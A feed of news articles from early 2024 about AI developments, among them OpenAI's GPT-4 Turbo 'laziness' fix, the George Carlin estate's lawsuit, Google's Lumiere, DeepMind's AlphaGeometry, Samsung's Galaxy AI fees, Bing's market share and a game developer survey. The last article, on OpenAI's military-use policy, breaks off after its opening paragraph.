AI

openai-updates-chatgpt-4-model-with-potential-fix-for-ai-“laziness”-problem

OpenAI updates ChatGPT-4 model with potential fix for AI “laziness” problem

Break’s over —

Also, new GPT-3.5 Turbo model, lower API prices, and other model updates.

A lazy robot (a man with a box on his head) sits on the floor beside a couch.

On Thursday, OpenAI announced updates to the AI models that power its ChatGPT assistant. Amid less noteworthy updates, OpenAI tucked in a mention of a potential fix to a widely reported “laziness” problem seen in GPT-4 Turbo since its release in November. The company also announced a new GPT-3.5 Turbo model (with lower pricing), a new embedding model, an updated moderation model, and a new way to manage API usage.

“Today, we are releasing an updated GPT-4 Turbo preview model, gpt-4-0125-preview. This model completes tasks like code generation more thoroughly than the previous preview model and is intended to reduce cases of ‘laziness’ where the model doesn’t complete a task,” writes OpenAI in its blog post.

Since the launch of GPT-4 Turbo, a large number of ChatGPT users have reported that the ChatGPT-4 version of its AI assistant has been declining to do tasks (especially coding tasks) with the same exhaustive depth as it did in earlier versions of GPT-4. We’ve seen this behavior ourselves while experimenting with ChatGPT over time.

OpenAI has never offered an official explanation for this change in behavior, but OpenAI employees have previously acknowledged on social media that the problem is real, and the ChatGPT X account wrote in December, “We’ve heard all your feedback about GPT4 getting lazier! we haven’t updated the model since Nov 11th, and this certainly isn’t intentional. model behavior can be unpredictable, and we’re looking into fixing it.”

We reached out to OpenAI asking if it could provide an official explanation for the laziness issue but did not receive a response by press time.

New GPT-3.5 Turbo, other updates

Elsewhere in OpenAI’s blog update, the company announced a new version of GPT-3.5 Turbo (gpt-3.5-turbo-0125), which it says will offer “various improvements including higher accuracy at responding in requested formats and a fix for a bug which caused a text encoding issue for non-English language function calls.”

And the cost of GPT-3.5 Turbo through OpenAI’s API will decrease for the third time this year “to help our customers scale.” New input token prices are 50 percent less, at $0.0005 per 1,000 input tokens, and output prices are 25 percent less, at $0.0015 per 1,000 output tokens.

Lower token prices for GPT-3.5 Turbo will make operating third-party bots significantly less expensive, but the GPT-3.5 model is generally more likely to confabulate than GPT-4 Turbo. So we might see more scenarios like Quora’s bot telling people that eggs can melt (although the instance used a now-deprecated GPT-3 model called text-davinci-003). If GPT-4 Turbo API prices drop over time, some of those hallucination issues with third parties might eventually go away.

OpenAI also announced new embedding models, text-embedding-3-small and text-embedding-3-large, which convert content into numerical sequences, aiding in machine learning tasks like clustering and retrieval. And an updated moderation model, text-moderation-007, is part of the company’s API that “allows developers to identify potentially harmful text,” according to OpenAI.

Finally, OpenAI is rolling out improvements to its developer platform, introducing new tools for managing API keys and a new dashboard for tracking API usage. Developers can now assign permissions to API keys from the API keys page, helping to clamp down on misuse of API keys (if they get into the wrong hands) that can potentially cost developers lots of money. The API dashboard allows devs to “view usage on a per feature, team, product, or project level, simply by having separate API keys for each.”

As the media world seemingly swirls around the company with controversies and think pieces about the implications of its tech, releases like these show that the dev teams at OpenAI are still rolling along as usual with updates at a fairly regular pace. Despite the company almost completely falling apart late last year, it seems that, under the hood, it’s business as usual for OpenAI.

OpenAI updates ChatGPT-4 model with potential fix for AI “laziness” problem Read More »

george-carlin’s-heirs-sue-comedy-podcast-over-“ai-generated”-impression

George Carlin’s heirs sue comedy podcast over “AI-generated” impression

AI’ll see you in court —

Suit alleges copyright infringement and illegal use of Carlin’s name and likeness.

A promotional image cited in the lawsuit uses Carlin's name and image to promote the Dudsey podcast and special.

Enlarge / A promotional image cited in the lawsuit uses Carlin’s name and image to promote the Dudsey podcast and special.

The estate of George Carlin has filed a federal lawsuit against the comedy podcast Dudesy for an hour-long comedy special sold as an AI-generated impression of the late comedian.

In the lawsuit, filed by Carlin manager Jerold Hamza in a California district court, the Carlin estate points out that the special, “George Carlin: I’m Glad I’m Dead,” presents itself as being created by an AI trained on decades worth of Carlin’s material. That training would, by definition, involve making “unauthorized copies” of “Carlin’s original, copyrighted routines” without permission in order “to fabricate a semblance of Carlin’s voice and generate a Carlin stand-up comedy routine,” according to the lawsuit.

“Defendants’ AI-generated ‘George Carlin Special’ is not a creative work,” the lawsuit reads, in part. “It is a piece of computer-generated click-bait which detracts from the value of Carlin’s comedic works and harms his reputation. It is a casual theft of a great American artist’s work.”

The Dudesy special “George Carlin: I’m glad I’m dead.

The use of copyrighted material in AI training models is one of the most contentious and unsettled areas of law in the AI field at the moment. Just this month, media organizations testified before Congress to argue against AI makers’ claims that training on news content was legal under a “fair use” exemption.

The Dudesy special is presented as an “impression” of Carlin that the AI generated by “listening” to Carlin’s existing material “in the exact same way a human impressionist would.” But the lawsuit takes direct issue with this analogy, arguing that an AI model is just an “output generated by a technological process that is an unlawful appropriation of Carlin’s identity, which also damages the value of Carlin’s real work and his legacy.”

In his image

There is some debate as to whether the Dudesy special was actually written by a specially trained AI, as Ars laid out in detail this week. But even a special that was partially or fully human-written would be guilty of unauthorized use of Carlin’s name and likeness for promotional purposes, according to the lawsuit.

“Defendants always presented the Dudesy Special as an AI-generated George Carlin comedy special, where George Carlin was ‘resurrected’ with the use of modern technology,” the lawsuit argues. “In short, Defendants sought to capitalize on the name, reputation, and likeness of George Carlin in creating, promoting, and distributing the Dudesy Special and using generated images of Carlin, Carlin’s voice, and images designed to evoke Carlin’s presence on a stage.”

A Dudesy-generated image representing AI's impending replacement of human stand-up comedy.

Enlarge / A Dudesy-generated image representing AI’s impending replacement of human stand-up comedy.

While the special doesn’t present images or video of Carlin (AI-generated or not), the YouTube thumbnail for the video shows an AI-generated image of a comedian with Carlin’s signature gray ponytail looking out over an audience. The lawsuit also cites numerous social media posts where Carlin’s name and image are used to promote the special or the Dudesy podcast.

That creates an “association” between the Dudesy podcast and Carlin that is “harmful to Carlin’s reputation, his legacy, and to the value of his real work,” according to the lawsuit. “Worse, if not curtailed now, future AI models may incorrectly associate the Dudesy Special with Carlin, ultimately folding Defendants’ knockoff version in with Carlin’s actual creative output.”

Anticipating potential free speech defenses, the lawsuit argues that the special “has no comedic or creative value absent its self-proclaimed connection with George Carlin” and that it doesn’t “satirize him as a performer or offer an independent critique of society.”

Kelly Carlin, the late comedian’s daughter, told The Daily Beast earlier this month that she was talking to lawyers about potential legal action. “It’s not his material. It’s not his voice,” she said at the time. “So they need to take the name off because it is not George Carlin.”

“The ‘George Carlin’ in that video is not the beautiful human who defined his generation and raised me with love,” Kelly Carlin wrote in a statement obtained by Variety. “It is a poorly executed facsimile cobbled together by unscrupulous individuals to capitalize on the extraordinary goodwill my father established with his adoring fanbase.”

The lawsuit asks a court to force Dudesy to “remove, take down, and destroy any video or audio copies… of the ‘George Carlin Special,’ wherever they may be located,” as well as pay punitive damages.

George Carlin’s heirs sue comedy podcast over “AI-generated” impression Read More »

google’s-latest-ai-video-generator-can-render-cute-animals-in-implausible-situations

Google’s latest AI video generator can render cute animals in implausible situations

An elephant with a party hat—underwater —

Lumiere generates five-second videos that “portray realistic, diverse and coherent motion.”

Still images of AI-generated video examples provided by Google for its Lumiere video synthesis model.

Enlarge / Still images of AI-generated video examples provided by Google for its Lumiere video synthesis model.

On Tuesday, Google announced Lumiere, an AI video generator that it calls “a space-time diffusion model for realistic video generation” in the accompanying preprint paper. But let’s not kid ourselves: It does a great job at creating videos of cute animals in ridiculous scenarios, such as using roller skates, driving a car, or playing a piano. Sure, it can do more, but it is perhaps the most advanced text-to-animal AI video generator yet demonstrated.

According to Google, Lumiere utilizes unique architecture to generate a video’s entire temporal duration in one go. Or, as the company put it, “We introduce a Space-Time U-Net architecture that generates the entire temporal duration of the video at once, through a single pass in the model. This is in contrast to existing video models which synthesize distant keyframes followed by temporal super-resolution—an approach that inherently makes global temporal consistency difficult to achieve.”

In layperson terms, Google’s tech is designed to handle both the space (where things are in the video) and time (how things move and change throughout the video) aspects simultaneously. So, instead of making a video by putting together many small parts or frames, it can create the entire video, from start to finish, in one smooth process.

The official promotional video accompanying the paper “Lumiere: A Space-Time Diffusion Model for Video Generation,” released by Google.

Lumiere can also do plenty of party tricks, which are laid out quite well with examples on Google’s demo page. For example, it can perform text-to-video generation (turning a written prompt into a video), convert still images into videos, generate videos in specific styles using a reference image, apply consistent video editing using text-based prompts, create cinemagraphs by animating specific regions of an image, and offer video inpainting capabilities (for example, it can change the type of dress a person is wearing).

In the Lumiere research paper, the Google researchers state that the AI model outputs five-second long 1024×1024 pixel videos, which they describe as “low-resolution.” Despite those limitations, the researchers performed a user study and claim that Lumiere’s outputs were preferred over existing AI video synthesis models.

As for training data, Google doesn’t say where it got the videos they fed into Lumiere, writing, “We train our T2V [text to video] model on a dataset containing 30M videos along with their text caption. [sic] The videos are 80 frames long at 16 fps (5 seconds). The base model is trained at 128×128.”

A block diagram showing components of the Lumiere AI model, provided by Google.

Enlarge / A block diagram showing components of the Lumiere AI model, provided by Google.

AI-generated video is still in a primitive state, but it’s been progressing in quality over the past two years. In October 2022, we covered Google’s first publicly unveiled image synthesis model, Imagen Video. It could generate short 1280×768 video clips from a written prompt at 24 frames per second, but the results weren’t always coherent. Before that, Meta debuted its AI video generator, Make-A-Video. In June of last year, Runway’s Gen2 video synthesis model enabled the creation of two-second video clips from text prompts, fueling the creation of surrealistic parody commercials. And in November, we covered Stable Video Diffusion, which can generate short clips from still images.

AI companies often demonstrate video generators with cute animals because generating coherent, non-deformed humans is currently difficult—especially since we, as humans (you are human, right?), are adept at noticing any flaws in human bodies or how they move. Just look at AI-generated Will Smith eating spaghetti.

Judging by Google’s examples (and not having used it ourselves), Lumiere appears to surpass these other AI video generation models. But since Google tends to keep its AI research models close to its chest, we’re not sure when, if ever, the public may have a chance to try it for themselves.

As always, whenever we see text-to-video synthesis models getting more capable, we can’t help but think of the future implications for our Internet-connected society, which is centered around sharing media artifacts—and the general presumption that “realistic” video typically represents real objects in real situations captured by a camera. Future video synthesis tools more capable than Lumiere will make deceptive deepfakes trivially easy to create.

To that end, in the “Societal Impact” section of the Lumiere paper, the researchers write, “Our primary goal in this work is to enable novice users to generate visual content in an creative and flexible way. [sic] However, there is a risk of misuse for creating fake or harmful content with our technology, and we believe that it is crucial to develop and apply tools for detecting biases and malicious use cases in order to ensure a safe and fair use.”

Google’s latest AI video generator can render cute animals in implausible situations Read More »

a-“robot”-should-be-chemical,-not-steel,-argues-man-who-coined-the-word

A “robot” should be chemical, not steel, argues man who coined the word

Dispatch from 1935 —

Čapek: “The world needed mechanical robots, for it believes in machines more than it believes in life.”

In 1921, Czech playwright Karel Čapek and his brother Josef invented the word “robot” in a sci-fi play called R.U.R. (short for Rossum’s Universal Robots). As Even Ackerman in IEEE Spectrum points out, Čapek wasn’t happy about how the term’s meaning evolved to denote mechanical entities, straying from his original concept of artificial human-like beings based on chemistry.

In a newly translated column called “The Author of the Robots Defends Himself,” published in Lidové Noviny on June 9, 1935, Čapek expresses his frustration about how his original vision for robots was being subverted. His arguments still apply to both modern robotics and AI. In this column, he referred to himself in the third-person:

For his robots were not mechanisms. They were not made of sheet metal and cogwheels. They were not a celebration of mechanical engineering. If the author was thinking of any of the marvels of the human spirit during their creation, it was not of technology, but of science. With outright horror, he refuses any responsibility for the thought that machines could take the place of people, or that anything like life, love, or rebellion could ever awaken in their cogwheels. He would regard this somber vision as an unforgivable overvaluation of mechanics or as a severe insult to life.

This recently resurfaced article comes courtesy of a new English translation of Čapek’s play called R.U.R. and the Vision of Artificial Life accompanied by 20 essays on robotics, philosophy, politics, and AI. The editor, Jitka Čejková, a professor at the Chemical Robotics Laboratory in Prague, aligns her research with Čapek’s original vision. She explores “chemical robots”—microparticles resembling living cells—which she calls “liquid robots.”

Enlarge / “An assistant of inventor Captain Richards works on the robot the Captain has invented, which speaks, answers questions, shakes hands, tells the time and sits down when it’s told to.” – September 1928

In Čapek’s 1935 column, he clarifies that his robots were not intended to be mechanical marvels, but organic products of modern chemistry, akin to living matter. Čapek emphasizes that he did not want to glorify mechanical systems but to explore the potential of science, particularly chemistry. He refutes the idea that machines could replace humans or develop emotions and consciousness.

The author of the robots would regard it as an act of scientific bad taste if he had brought something to life with brass cogwheels or created life in the test tube; the way he imagined it, he created only a new foundation for life, which began to behave like living matter, and which could therefore have become a vehicle of life—but a life which remains an unimaginable and incomprehensible mystery. This life will reach its fulfillment only when (with the aid of considerable inaccuracy and mysticism) the robots acquire souls. From which it is evident that the author did not invent his robots with the technological hubris of a mechanical engineer, but with the metaphysical humility of a spiritualist.

The reason for the transition from chemical to mechanical in the public perception of robots isn’t entirely clear (though Čapek does mention a Russian film which went the mechanical route and was likely influential). The early 20th century was a period of rapid industrialization and technological advancement that saw the emergence of complex machinery and electronic automation, which probably influenced the public and scientific community’s perception of autonomous beings, leading them to associate the idea of robots with mechanical and electronic devices rather than chemical creations.

The 1935 piece is full of interesting quotes (you can read the whole thing in IEEE Spectrum or here), and we’ve grabbed a few highlights below that you can conveniently share with your robot-loving friends to blow their minds:

  • “He pronounces that his robots were created quite differently—that is, by a chemical path”
  • “He has learned, without any great pleasure, that genuine steel robots have started to appear”
  • “Well then, the author cannot be blamed for what might be called the worldwide humbug over the robots.”
  • “The world needed mechanical robots, for it believes in machines more than it believes in life; it is fascinated more by the marvels of technology than by the miracle of life.”

So it seems, over 100 years later, that we’ve gotten it wrong all along. Čapek’s vision, rooted in chemical synthesis and the philosophical mysteries of life, offers a different narrative from the predominant mechanical and electronic interpretation of robots we know today. But judging from what Čapek wrote, it sounds like he would be firmly against AI takeover scenarios. In fact, Čapek, who died in 1938, probably would think they would be impossible.

A “robot” should be chemical, not steel, argues man who coined the word Read More »

deepmind-ai-rivals-the-world’s-smartest-high-schoolers-at-geometry

DeepMind AI rivals the world’s smartest high schoolers at geometry

Demis Hassabis, CEO of DeepMind Technologies and developer of AlphaGO, attends the AI Safety Summit at Bletchley Park on November 2, 2023 in Bletchley, England.

Enlarge / Demis Hassabis, CEO of DeepMind Technologies and developer of AlphaGO, attends the AI Safety Summit at Bletchley Park on November 2, 2023 in Bletchley, England.

A system developed by Google’s DeepMind has set a new record for AI performance on geometry problems. DeepMind’s AlphaGeometry managed to solve 25 of the 30 geometry problems drawn from the International Mathematical Olympiad between 2000 and 2022.

That puts the software ahead of the vast majority of young mathematicians and just shy of IMO gold medalists. DeepMind estimates that the average gold medalist would have solved 26 out of 30 problems. Many view the IMO as the world’s most prestigious math competition for high school students.

“Because language models excel at identifying general patterns and relationships in data, they can quickly predict potentially useful constructs, but often lack the ability to reason rigorously or explain their decisions,” DeepMind writes. To overcome this difficulty, DeepMind paired a language model with a more traditional symbolic deduction engine that performs algebraic and geometric reasoning.

The research was led by Trieu Trinh, a computer scientist who recently earned his PhD from New York University. He was a resident at DeepMind between 2021 and 2023.

Evan Chen, a former Olympiad gold medalist who evaluated some of AlphaGeometry’s output, praised it as “impressive because it’s both verifiable and clean.” Whereas some earlier software generated complex geometry proofs that were hard for human reviewers to understand, the output of AlphaGeometry is similar to what a human mathematician would write.

AlphaGeometry is part of DeepMind’s larger project to improve the reasoning capabilities of large language models by combining them with traditional search algorithms. DeepMind has published several papers in this area over the last year.

How AlphaGeometry works

Let’s start with a simple example shown in the AlphaGeometry paper, which was published by Nature on Wednesday:

The goal is to prove that if a triangle has two equal sides (AB and AC), then the angles opposite those sides will also be equal. We can do this by creating a new point D at the midpoint of the third side of the triangle (BC). It’s easy to show that all three sides of triangle ABD are the same length as the corresponding sides of triangle ACD. And two triangles with equal sides always have equal angles.

Geometry problems from the IMO are much more complex than this toy problem, but fundamentally, they have the same structure. They all start with a geometric figure and some facts about the figure like “side AB is the same length as side AC.” The goal is to generate a sequence of valid inferences that conclude with a given statement like “angle ABC is equal to angle BCA.”

For many years, we’ve had software that can generate lists of valid conclusions that can be drawn from a set of starting assumptions. Simple geometry problems can be solved by “brute force”: mechanically listing every possible fact that can be inferred from the given assumption, then listing every possible inference from those facts, and so on until you reach the desired conclusion.

But this kind of brute-force search isn’t feasible for an IMO-level geometry problem because the search space is too large. Not only do harder problems require longer proofs, but sophisticated proofs often require the introduction of new elements to the initial figure—as with point D in the above proof. Once you allow for these kinds of “auxiliary points,” the space of possible proofs explodes and brute-force methods become impractical.

DeepMind AI rivals the world’s smartest high schoolers at geometry Read More »

wordpad-out;-80gbps-usb-support-and-other-win-11-features-in-testing-this-month

WordPad out; 80Gbps USB support and other Win 11 features in testing this month

Can’t stop won’t stop —

Microsoft’s next batch of Windows 11 feature updates is taking shape.

Green USB-C cable

Windows 11’s big feature update in September included a long list of minor changes, plus the Copilot AI assistant; that update was followed by Windows 11 23H2 in late October, which reset the operating system’s timeline for technical support and security updates but didn’t add much else in and of itself. But Windows development never stops these days, and this month’s Insider Preview builds have already shown us a few things that could end up in the stable version of the operating system in the next couple of months.

One major addition, which rolled out to Dev Channel builds on January 11 and Beta Channel builds today, is support for 80Gbps USB 4 ports. These speeds are part of the USB4 Version 2.0 spec—named with the USB-IF’s typical flair for clarity and consistency—that was published in 2022. Full 80Gbps speeds are still rare and will be for the foreseeable future, but Microsoft says that they’ll be included the Razer Blade 18 and a handful of other PCs with Intel’s 14th-generation HX-series laptop processors. We’d expect the new speeds to proliferate slowly and mostly in high-end systems over the next few months and years.

Another addition to that January 11 Dev Channel build is a change in how the Copilot generative AI assistant works. Normally, Copilot is launched by the user manually, either by clicking the icon on the taskbar, hitting the Win+C key combo, or (in some new PCs) by using the dedicated Copilot button on the keyboard. In recent Dev Channel builds, the Copilot window will open automatically on certain PCs as soon as you log into Windows, becoming part of your default desktop unless you turn it off in Settings.

The Copilot panel will only open by default on screens that meet minimum size and resolution requirements, things that Windows already detects and takes into account when setting your PC’s default zoom and showing available Snap Layouts, among other things. Microsoft says it’s testing the feature on screens that are 27 inches or larger with 1,920 or more horizontal pixels (for most screens, this means a minimum resolution of 1080p). For PCs without Copilot, including those that haven’t been signed into a Microsoft account, the feature will continue to be absent.

The

Enlarge / The “richer weather experience on the Lock screen,” seen in the bottom-center of this screenshot.

Microsoft

Other additions to the Dev Channel builds this month include easy Snipping Tool editing for Android screenshots from phones that have been paired to your PC, custom user-created voice commands, the ability to share URLs directly to services like WhatsApp and Gmail from the Windows share window, a new Weather widget for the Windows lock screen, and app install notifications from the Microsoft store.

Microsoft hasn’t publicized any of the changes it has made to its Canary channel builds since January 4—this is typical since it changes the fastest, and the tested features are the most likely to be removed or significantly tweaked before being released to the public. Most of the significant additions from that announcement have since made it out to the other channels, but there are a couple of things worth noting. First, there’s a new Energy Saver taskbar icon for desktop PCs without batteries, making it easier to tell when the feature is on without creating confusion. And the venerable WordPad app, originally marked for deletion in September, has also been removed from these builds and can’t be reinstalled.

Microsoft doesn’t publish Windows feature updates on an exact cadence beyond its commitment to deliver one with a new version number once per year in the fall. Last year’s first major batch of Windows 11 additions rolled out at the end of February, so a late winter or early spring launch window for the next batch of features could make sense.

WordPad out; 80Gbps USB support and other Win 11 features in testing this month Read More »

“alexa-is-in-trouble”:-paid-for-alexa-gives-inaccurate-answers-in-early-demos

“Alexa is in trouble”: Paid-for Alexa gives inaccurate answers in early demos

Amazon Echo Show 8 with Alexa

Enlarge / Amazon demoed future generative AI capabilties for Alexa in September.

“If this fails to get revenue, Alexa is in trouble.”

A quote from an anonymous Amazon employee in a Wednesday Business Insider report paints a dire picture. Amazon needs its upcoming subscription version of Alexa to drive revenue in ways that its voice assistant never has before.

Amazon declined Ars’ request for comment on the report. But the opening quote in this article could have been uttered by anyone following voice assistants for the past year-plus. All voice assistants have struggled to drive revenue since people tend to use voice assistants for basic queries, like checking the weather, rather than transactions.

Amazon announced plans to drive usage and interest in Alexa by releasing a generative AI version that it said would one day require a subscription.

This leads to the question: Would you pay to use Alexa? Amazon will be challenged to convince people to change how they use Alexa while suddenly paying a monthly rate to enable that unprecedented behavior.

Workers within Amazon seemingly see this obstacle. Insider, citing an anonymous Amazon employee, reported that “some were questioning the entire premise of charging for Alexa. For example, people who already pay for an existing Amazon service, such as Amazon Music, might not be willing to pay additional money to get access to the newer version of Alexa.”

“There is tension over whether people will pay for Alexa or not,” one of the anonymous Amazon workers reportedly said.

Subscription-based Alexa originally planned for June release

Amazon hasn’t publicly confirmed a release date for generative AI Alexa. But Insider’s report, citing “internal documents and people familiar with the matter,” said Amazon has been planning to release its subscription plan on June 30. However, plans for what Insider said will be called “Alexa Plus” and built on “Remarkable Alexa” technology could be delayed due to numerous development challenges.

According to the report, the Remarkable Alexa tech has been being demoed by 15,000 customers and currently succeeds in being conversational but is “deflecting answers, often giving unnecessarily long or inaccurate responses.”

In September, then-SVP of devices and services at Amazon David Limp demoed Alexa understanding more complex commands, including Alexa not requiring the “Hey Alexa” prompt and being able to understand multiple demands for multiple apps through a single spoken phrase.

Insider reported: “The new Alexa still didn’t meet the quality standards expected for Alexa Plus, these people added, noting the technical challenges and complexity of redesigning Alexa.”

“Legacy constraints”

According to the report, people working on the original Alexa insisted on using what they had already built for the standard voice assistant with the paid-for version, resulting in a bloated technology and “internal politics.”

However, the original Alexa is based on a natural language model with multiple parts doing multiple things, compared to the colossal large language model of generative AI Alexa.

Now, generative AI Alexa is reportedly moving to a new technological stack to avoid the “legacy constraints” of today’s Alexa but potentially delaying things.

“Alexa is in trouble”: Paid-for Alexa gives inaccurate answers in early demos Read More »

samsung’s-$1,300-phone-might-someday-have-fees-for-ai-usage

Samsung’s $1,300 phone might someday have fees for AI usage

Will Samsung even care about AI in 2026? —

Samsung says Galaxy S24 AI features are “free until the end of 2025.”

Samsung’s $1,300 phone might someday have fees for AI usage

Samsung

Samsung’s big Galaxy S24 launch was yesterday, and to hear Samsung tell the story, the big highlight of the event was “Galaxy AI.” Another view is that Galaxy AI is the usual bundle of baked-in Samsung features skinned on top of Android, but with generative AI being the hot new thing, Samsung went with AI-centric branding. Whatever value you want to place on Samsung’s AI features, you might soon have to place an actual monetary value on them: Despite devices like the Galaxy S24 Ultra costing $1,300, Samsung might start charging for some of these AI phone features.

The fine print on Samsung’s Galaxy S24 promotional page features 44 asterisks and footnotes, and tucked away in that pile of caveats is the line “Galaxy AI features will be provided for free until the end of 2025 on supported Samsung Galaxy devices.” That means Samsung reserves the right to charge for Galaxy AI after 2025.

AI features that require server time have an ongoing cost. Google and Amazon figured this out in the last AI generation (if we can call it that) with the Google Assistant and Alexa voice assistants. Amazon’s finances on the whole situation are clearer than Google’s, and Amazon’s 2022 Alexa financials were reportedly a $10 billion loss. Amazon is planning on a subscription model for Alexa in the future. Google’s normal user subscription plan is Google One, and while that mainly gets you more account storage, it also unlocks some Google AI features like “Magic eraser” in Google Photos. ChatGPT has a subscription plan for its best model, ChatGPT 4, too. Samsung apparently wants to join the party.

The Galaxy S24's

Enlarge / The Galaxy S24’s “Live translate” feature in the phone app. You can speak one language, and the phone app will repeat your message in a different language after a delay.

Samsung

This is the company that makes Bixby and the notoriously poorly coded Tizen, though, so it’s hard to imagine Galaxy AI features being worth paying for. The first item on Samsung’s “Galaxy AI” promo page is Google’s “Circle to search,” a feature it can’t charge for and didn’t build. The Galaxy AI features made by Samsung include “Interpreter,” which is a copy of Google Translate’s conversation mode, and Voice Recorder, a voice transcription app that is just a copy of Google Recorder (and apparently not as good). “Chat Assist” is part of the keyboard and can rewrite any inputted text with generative AI, making your input sound more “fun” or “professional.” “Note Assist” is a Samsung Notes feature that can generate AI summaries of your notes. The one interesting feature is “Live Translate,” which does voice translation of a phone call, translating communication via speech-to-text-to-speech. There’s a lot that can go wrong there, though.

Samsung is a hardware company, and presumably, a lot of these use on-device processing instead of bothering a server somewhere, so it’s hard to know if Samsung even has any serious costs to recoup. Like most Samsung Android features, this feels more like throwing a pile of stuff at the wall and hoping something sticks rather than a collection of killer apps. These are essentially all just app features, too, meaning they have to compete with the nearly infinite Play Store app selection, and you could easily download a free competitor.

The first step to charging for something like this is throwing the idea out there, so Samsung is probably listening to how people will react between now and the end of 2025.

Samsung’s $1,300 phone might someday have fees for AI usage Read More »

bing-search-shows-few,-if-any,-signs-of-market-share-increase-from-ai-features

Bing Search shows few, if any, signs of market share increase from AI features

high hopes —

Bing’s US and worldwide market share is about the same as it has been for years.

Bing Search shows few, if any, signs of market share increase from AI features

Microsoft

Not quite one year ago, Microsoft announced a “multi-year, multi-billion dollar investment” in OpenAI, a company that had made waves in 2022 with its ChatGPT chatbot and DALL-E image creator. The next month, Microsoft announced that it was integrating a generative AI chatbot into its Bing search engine and Edge browser, and similar generative AI features were announced for Windows in the apps formerly known as Microsoft Office, Microsoft Teams, and other products.

Adding AI features to Bing was meant to give it an edge over Google, and reports indicated that Google was worried enough about it to accelerate its own internal generative AI efforts. Microsoft announced in March 2023 that Bing surpassed the 100 million monthly active users mark based on interest in Bing Chat and its ilk; by Microsoft’s estimates, each percentage of Google’s search market share that Bing could siphon away was worth as much as $2 billion to Microsoft.

A year later, it looks like Microsoft’s AI efforts may have helped Bing on the margins, but they haven’t meaningfully eroded Google’s search market share, according to Bloomberg. Per Bloomberg’s analysis of data from Sensor Tower, Bing usage had been down around 33 percent year over year just before the AI-powered features were added, but those numbers had rebounded by the middle of 2023.

Microsoft hasn’t given an official update on Bing’s monthly active users in quite a while—we’ve asked the company for an update, and will share it if we get one—though Microsoft Chief Marketing Officer Yusuf Medhi told Bloomberg that “millions and millions of people” were still using the new AI features.

StatCounter data mostly tells a similar story. According to its data, Google’s worldwide market share is currently in the low 90s, and it has been for virtually the entire 15-year period for which StatCounter offers data. Bing’s worldwide market share number over the same period has been remarkably stable; it was about 3.5 percent in the summer of 2009, when what had been known as Live Search was renamed Bing in the first place, and as of December 2023, it was still stuck at around 3.4 percent.

Recent US data is slightly more flattering for Microsoft, where Bing’s usage rose from 6.7 percent in December 2022 to 7.7 percent in December 2023. But that doesn’t necessarily suggest any kind of AI-fueled influx in new Bing search users—usage remained in the mid-to-high 6 percent range through most of 2023 before ticking up right at the end of the year—and Bing’s US usage has floated in that same 6–7 percent zone for most of the last decade.

It even seems like Microsoft is making moves to distance its AI efforts from Bing a bit. What began as “Bing Chat” or “the new Bing” is now known as Windows Copilot—both inside Windows 11 and elsewhere. Earlier this week, the Bing Image Creator became “Image Creator from Designer.” Both products still feature Bing branding prominently—the Copilot screen in Windows 11 still says “with Bing” at the top of it, and the Image Creator tool is still hosted on the Bing.com domain. But if these new AI features aren’t driving Bing’s market share up, then it makes sense for Microsoft to create room for them to stand on their own.

That’s not to say Google’s search dominance is assured. Leipzig University researchers published a study earlier this week (PDF) suggesting Google, Bing, and the Bing-powered DuckDuckGo had seen “an overall downward trend in text quality,” especially for heavily SEO-optimized categories like purchase recommendations and product reviews.

Bing Search shows few, if any, signs of market share increase from AI features Read More »

game-developer-survey:-50%-work-at-a-studio-already-using-generative-ai-tools

Game developer survey: 50% work at a studio already using generative AI tools

Do androids dream of Tetris? —

But 84% of devs are at least somewhat concerned about ethical use of those tools.

The future of game development?

Enlarge / The future of game development?

A new survey of thousands of game development professionals finds a near-majority saying generative AI tools are already in use at their workplace. But a significant minority of developers say their company has no interest in generative AI tools or has outright banned their use.

The Game Developers Conference’s 2024 State of the Industry report, released Thursday, aggregates the thoughts of over 3,000 industry professionals as of last October. While the annual survey (conducted in conjunction with research partner Omdia) has been running for 12 years, this is the first time respondents were asked directly about their use of generative AI tools such as ChatGPT, DALL-E, GitHub Copilot, and Adobe Generative Fill.

Forty-nine percent of the survey’s developer respondents said that generative AI tools are currently being used in their workplace. That near-majority includes 31 percent (of all respondents) that say they use those tools themselves and 18 percent that say their colleagues do.

A majority of game developers said their workplace was at least interested in using generative AI tools.

Enlarge / A majority of game developers said their workplace was at least interested in using generative AI tools.

The survey also found that different studio departments showed different levels of willingness to embrace AI tools. Forty-four percent of employees in business and finance said they were using AI tools, for instance, compared to just 16 percent in visual arts and 13 percent in “narrative/writing.”

Among the 38 percent of respondents who said their company didn’t use AI tools, 15 percent said their company was “interested” in pursuing them, while 23 percent said they had “no interest.” In a separate question, 12 percent of respondents said their company didn’t allow the use of AI tools at all, a number that went up to 21 percent for respondents working at the largest “AAA developers.” An additional 7 percent said the use of some specific AI tools was not allowed, while 30 percent said AI tool use was “optional” at their company.

Worries abound

The wide embrace of AI tools hasn’t seemed to lessen worries about their use among developers, though. A full 42 percent of respondents said they were “very concerned” about the ethics of using generative AI in game development, with an additional 42 percent being “somewhat concerned.” Only 12 percent said they were “not concerned at all” about those usage ethics.

Developer policies on AI use varied greatly, with a plurality saying their company had no official policy.

Enlarge / Developer policies on AI use varied greatly, with a plurality saying their company had no official policy.

Overall, respondents offered a split opinion on whether the use of AI tools would be overall positive (21 percent) or negative (18 percent) for the industry. Most respondents seemed split, with 57 percent saying the impact would be “mixed.”

Developers cited coding assistance, content creation efficiency, and the automation of repetitive tasks as the primary uses for AI tools, according to the report.

“I’d like to see AI tools that help with the current workflows and empower individual artists with their own work,” one anonymous respondent wrote. “What I don’t want to see is a conglomerate of artists being enveloped in an AI that just does 99% of the work a creative is supposed to do.”

Elsewhere in the report, the survey found that only 17 percent of developers were at least somewhat interested in using blockchain technology in their upcoming projects, down significantly from 27 percent in 2022. An overwhelming 77 percent of respondents said they had no interest in blockchain technology, similar to recent years.

The survey also found that 57 percent of respondents thought that workers in the game industry should unionize, up from 53 percent last year. Despite this, only 23 percent said they were either in a union or had discussed unionization at their workplace.

Game developer survey: 50% work at a studio already using generative AI tools Read More »

openai-opens-the-door-for-military-uses-but-maintains-ai-weapons-ban

OpenAI opens the door for military uses but maintains AI weapons ban

Skynet deferred —

Despite new Pentagon collab, OpenAI won’t allow customers to “develop or use weapons” with its tools.

The OpenAI logo over a camoflage background.

On Tuesday, ChatGPT developer OpenAI revealed that it is collaborating with the United States Defense Department on cybersecurity projects and exploring ways to prevent veteran suicide, reports Bloomberg. OpenAI revealed the collaboration during an interview with the news outlet at the World Economic Forum in Davos. The AI company recently modified its policies, allowing for certain military applications of its technology, while maintaining prohibitions against using it to develop weapons.

